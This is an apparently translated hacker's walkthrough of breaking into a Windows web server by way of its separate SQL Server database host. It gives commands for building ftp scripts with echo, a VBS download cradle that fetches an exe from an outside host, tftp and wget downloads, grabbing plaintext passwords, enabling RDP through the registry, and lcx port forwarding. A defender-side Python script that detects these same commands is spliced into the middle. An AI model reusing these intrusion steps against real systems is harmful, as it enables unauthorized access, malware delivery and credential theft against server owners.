Web server and database on separate hosts: taking the intranet database server to reach the target server

Source: Internet
Author: User
Tags: how to use sql server, how to use sql

0x00 Privilege escalation environment
A friend asked me to dump the database on this machine ~~~
Then I tried privilege escalation.
A port scan showed that 80 and 3389 were open.
Windows 2003 x86

Since the database had already been dumped, there obviously had to be a database server.

As shown in the figure (not reproduced here), the web server and the database are on separate machines. At the time I naively used sa to execute the add-user command.
The result: it could not connect ~~~ It could not connect!!!
Well, there are a couple of ideas:
1. Ignore the configuration file and escalate privileges directly on the original server.
2. Use sa to take the intranet (database) server first, then use it to take the original server.
Try the first one first ~~
 
0x01 Privilege escalation on the original server
There is no common third-party software, so the only route is an overflow exploit.
The tragedy is that basically every overflow exploit ends the same way: either it is killed or it does not execute.

Okay, I dropped an lpk.dll file ~~~ Let's continue with the next idea.
 
0x02 Take the intranet server first

There are also several ideas for using the intranet server ~~~
First, without taking the server down at all, directly read the hashes and then crack them to see whether all intranet machines share the same password ~~~
Second, use the lcx port-forwarding tool to take the server and then collect information on it.
However, both ideas require uploading files to the database server.
How do I upload files to the server?
There are many ways; I will introduce three common methods.
First, use cmd to call ftp (or tftp) to upload a file (the 1433 data-transfer principle)
Second, use SQL statements to create a temporary table, write the data in, and export it
Third, upload via a vbs script
Let's start with the first one (a friend may ask why the file is not written to the server with the echo command ~~~~ echo only writes one line at a time, and the line is cut as soon as a > or >> symbol is encountered, because cmd treats it as a redirection, so do not use echo to write files that contain those symbols ~~)
 
First, build an ftp server on the local machine.
The configuration is as follows (screenshot not reproduced here):
Select the folder; the folder contains the file to upload, 1.txt.

Use cmd to write the commands one line at a time (the first line uses > to create the file, the following lines use >> to append):
echo open 223.85.31.141> test.txt      log on to the ftp server; 223.85.31.141 is the local ip address
echo test>> test.txt                    write the user name
echo test>> test.txt                    write the password
echo bin>> test.txt                     is equivalent to pressing Enter
echo get 1.txt>> test.txt               download the 1.txt file from the ftp server
echo bye>> test.txt                     close the ftp session

Cmd execution is complete.
Then use the type command to view the contents of test.txt:
type test.txt
---------------------------------------------------------------------------------------------------------------
open 223.85.31.141
test
test
bin
get 1.txt
bye
---------------------------------------------------------------------------------------------------------------
Written successfully.
The following command calls ftp to download the file by executing these commands ~~~~

The local test results are as follows:
----------------------------------------------------------------------------------------------------------------------------
ftp -s:test.txt
ftp> open 223.85.31.141
Connected to 223.85.31.141.
220 Welcome to sus ftp Server
User (223.85.31.141:(none)):
331 Password required for test

230 Logged on
ftp> bin
200 set to I
ftp> get 1.txt
200 Port command successful
150 Opening data channel for file transfer.
226 Transfer complete
ftp: 11 bytes received in 11.00 seconds, 0.00 KB/second.
ftp> bye
220 Bye
---------------------------------------------------------------------------------------------------------------------
 
 
The tragedy is that running the command on the server gives:
---------------------------------------------------------------------------------------------------------------------
'ftp' is not recognized as an internal or external command,
operable program or batch file.
---------------------------------------------------------------------------------------------------------------------
The cause is that ftp.exe has been deleted, or something fancy is going on.
 
The second approach is to use SQL statements to write the data and export it ~~~
I was too lazy to write the SQL statements for the stored procedure, so I looked for a ready-made script on the Internet to upload files.

Luckily, I found Sa-Upfile 1.0 (upload files with sa permission).
Environment: SQL 2000, sa permission; it is commonly used as a privilege escalation aid.
Principle: use textcopy to import and export binary data.
Okay, let's try it.

It is really easy to use, and it succeeded straight away ~~~~~
It seems a cainiao (newbie) really is a cainiao. So this is the legendary saupfile ~~~~
For the principle, see this article:
How to use SQL SERVER to remotely upload files
 
Here I will also add vbs and tftp downloads ~~ Some administrators delete ftp.exe,
so that upload method cannot be used.
VBS download:
This is where scripts show their power ~~~~
The script only requires ADODB.Stream support, which Windows provides by default.
The download script is as follows (also run from cmd; note the space before the final >, because cmd would otherwise read the trailing "2>" as a redirection of stderr):
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://f4ck.yueyan.net/yueyan.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"C:\yueyan.exe^",2 >down.vbs

Then run cscript down.vbs to complete the download.
 
tftp download:
tftp download should be the easiest way to upload. Why do I mention it last? Because I do not recommend tftp upload;
I just introduce it for completeness.
The reason is that tftp is based on the UDP protocol. Anyone who understands UDP and TCP/IP should know that UDP is designed to carry small amounts of data; QQ chat messages are based on this protocol. Therefore only small files can be transferred. Of course, there is no problem transferring a wget binary ~~~~ However, some anti-virus software sometimes blocks the transfer ~~ so it is not recommended.

Let's talk about usage: first, start a tftp server (screenshot not reproduced here)

Then execute the command on the server; one line is enough:
tftp -i <your ip> get yueyan.exe path\yueyan.exe
For example, to download yueyan.exe to the root of C:, run
tftp -i 110.110.110.110 get yueyan.exe c:\yueyan.exe
This is simple. If no path is given, the system32 directory is used by default.
 
 
If more files need to be downloaded, I recommend uploading wget.exe first.
The command is as follows:

wget http://f4ck.yueyan.com/yueyan.exe
This makes it easier to upload other files.
 
First, use getpass.exe to grab the plaintext password directly:
------------------------------------------------------------------------------------------------------------------------------
UserName: Administrator
LogonDomain: WIN-QUB8GLT3HKB
Password: 000
--------------------------------------------------------------------------------------------------------------------------------
Seriously ~~~~ 000? So I tried it on the original server.

 
I could not log on to the server. Okay, I admit I did something dumb today ~~~
This is easy to handle: check whether 3389 is enabled on the server.
Use netstat -an to look for the remote terminal port, or query it from the registry:
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
Because we have SYSTEM permission, we can directly run the command to enable it.
Enable 3389:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

After forwarding the port it will be OK ~~

The local machine executes: lcx -listen 51 33891
The server executes: lcx -slave 223.85.31.141 51 127.0.0.1 3389
Then connect to 127.0.0.1:33891

 
Okay ~~~ Finally in ~~~
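As an added, defender-side example (not part of the original writeup), the following Python script shows how the file-upload commands (echo-built ftp script, ftp -s:, the cscript download cradle, tftp -i get) and the 3389-enabling and lcx port-forwarding commands described in 0x02 would look to a detection rule run over process-creation logs. It also flags the root signal behind all of them on the database server: a shell or script host whose parent process is sqlservr.exe. The "host|user|parent_image|command_line" log layout, the hostnames, user names and every sample line are constructed for this example; the rule names and the SHELL_IMAGES list are this example's own choices, not from any product.

```python
"""Flag, in process-creation log lines, the command patterns this writeup relies
on: echo-built ftp scripts, ftp -s:, cscript download cradles, tftp -i get,
reg add fDenyTSConnections=0 and lcx port forwarding, plus shells spawned
directly by the SQL Server process (xp_cmdshell-style execution)."""
import re
from collections import Counter, namedtuple

Event = namedtuple("Event", "host user parent cmdline")

# Constructed sample events in a simplified "host|user|parent_image|command_line"
# layout modelled on Sysmon event 1 / Windows 4688; not real logs from the writeup.
SAMPLE_LOGS = [
    "dbsrv01|NT AUTHORITY\\SYSTEM|sqlservr.exe|cmd.exe /c echo open 223.85.31.141> test.txt",
    "dbsrv01|NT AUTHORITY\\SYSTEM|sqlservr.exe|cmd.exe /c ftp -s:test.txt",
    "dbsrv01|NT AUTHORITY\\SYSTEM|cmd.exe|cscript down.vbs",
    "dbsrv01|NT AUTHORITY\\SYSTEM|cmd.exe|tftp -i 110.110.110.110 get yueyan.exe c:\\yueyan.exe",
    "dbsrv01|NT AUTHORITY\\SYSTEM|cmd.exe|reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f",
    "dbsrv01|NT AUTHORITY\\SYSTEM|cmd.exe|lcx -slave 223.85.31.141 51 127.0.0.1 3389",
    "websrv01|CORP\\alice|explorer.exe|notepad.exe report.txt",
]

# Command-line patterns, one per technique shown in the writeup (rule names are our own).
COMMAND_RULES = {
    "echo-ftp-script": re.compile(r"\becho\s+(?:open|user|get|put|bin|bye)\b.*>>?\s*\S+", re.I),
    "ftp-script-transfer": re.compile(r"\bftp(?:\.exe)?\s+-s:", re.I),
    "vbs-download-cradle": re.compile(r"Microsoft\.XMLHTTP|ADODB\.Stream|\bcscript(?:\.exe)?\s+\S+\.vbs\b", re.I),
    "tftp-get": re.compile(r"\btftp(?:\.exe)?\s+-i\s+\S+\s+get\b", re.I),
    "rdp-enabled-via-registry": re.compile(r"\breg(?:\.exe)?\s+add\b.*fDenyTSConnections.*/d\s*0\b", re.I),
    "port-forwarder": re.compile(r"\blcx(?:\.exe)?\s+-(?:slave|listen|tran)\b", re.I),
}

# Interpreters and transfer tools that should never be children of the SQL Server process.
SHELL_IMAGES = {"cmd.exe", "cscript.exe", "wscript.exe", "powershell.exe", "ftp.exe", "tftp.exe"}


def parse_event(line):
    """Split one constructed log line into its four fields."""
    host, user, parent, cmdline = line.split("|", 3)
    return Event(host, user, parent.strip().lower(), cmdline.strip())


def image_name(cmdline):
    """First token of the command line without its directory (simplified: assumes an unquoted image path)."""
    if not cmdline:
        return ""
    token = cmdline.split()[0].strip('"').lower()
    return token.rsplit("\\", 1)[-1]


def match_rules(event):
    """Return the names of every rule the event triggers."""
    hits = [name for name, rx in COMMAND_RULES.items() if rx.search(event.cmdline)]
    # Parent/child relationship is the strongest signal: sqlservr.exe launching a
    # shell is what xp_cmdshell-style execution looks like, whatever the command.
    if event.parent == "sqlservr.exe" and image_name(event.cmdline) in SHELL_IMAGES:
        hits.append("sqlserver-spawned-shell")
    return hits


def scan(lines):
    """Produce (host, user, rule, command_line) findings for a batch of log lines."""
    findings = []
    for event in map(parse_event, lines):
        for rule in match_rules(event):
            findings.append((event.host, event.user, rule, event.cmdline))
    return findings


def summarize(findings):
    """Count rule hits per host so the noisiest host floats to the top."""
    return Counter((host, rule) for host, _, rule, _ in findings)


if __name__ == "__main__":
    for host, user, rule, cmdline in scan(SAMPLE_LOGS):
        print(f"{host}\t{user}\t{rule}\t{cmdline}")
    for (host, rule), n in summarize(scan(SAMPLE_LOGS)).most_common():
        print(f"{host}: {rule} x{n}")
```

Run against the constructed sample, every dbsrv01 line is flagged and the two cmd.exe launches whose parent is sqlservr.exe are additionally reported as sqlserver-spawned-shell, while the unrelated websrv01 line produces nothing. In a real deployment the parse_event step would be replaced by the SIEM's own field extraction, and the sqlserver-spawned-shell rule is the one worth keeping even if the command-line patterns are tuned away, since it does not depend on which transfer tool the operator chose.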
 
0x03 Taking the original server from the intranet
With one server taken, it is time to bring out my artifact ~~~ H-scan (screenshot not reproduced here)

Bring out the second artifact ~~~ Sqltool
Privilege escalation one machine at a time ~~~~
Frantically taking servers ~~~~ Why take servers? To collect information ~~
Take a server, grab its passwords ~~~~
Several passwords were obtained ~~~~
Then log on to the original machine.
Login successful

Actually, there was no real reason to take this server other than to escalate privileges ~~~
